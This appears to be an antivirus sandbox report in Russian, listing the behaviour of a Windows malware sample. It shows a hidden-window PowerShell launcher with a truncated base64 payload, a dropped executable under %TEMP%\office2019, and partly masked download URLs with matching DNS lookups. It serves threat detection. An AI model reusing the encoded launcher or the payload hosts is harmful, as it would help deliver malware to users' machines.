Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAGcAMABqAHIAMwBwAD0AKAAnAFIAdgB6AG0ANgAnACsAJwBxAGcAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAFYAOgBUAEUATQBwAFwATwBGAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\ihz_2rk.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\office2019\ihz_2rk.exe
- http://th##ning.de/cgi-bin/uo9wm/
- http://po#####lmypassion.com/wp-content/gJWA/
- http://co#####laesperanza.cl/new_img/fuJUk/
- http://ne######icaltechnology.com/cgi-bin/SkB/
- http://se###sgo.com/e9x8b82yg/y651K/
- http://www.fe###nform.de/localization/n7g/
- DNS ASK th##ning.de
- DNS ASK po#####lmypassion.com
- DNS ASK co#####laesperanza.cl
- DNS ASK ne######icaltechnology.com
- DNS ASK se###sgo.com
- DNS ASK th####assive.com
- DNS ASK fe###nform.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAGcAMABqAHIAMwBwAD0AKAAnAFIAdgB6AG0ANgAnACsAJwBxAGcAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAFYAOgBUAEUATQBwAFwATwBGAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)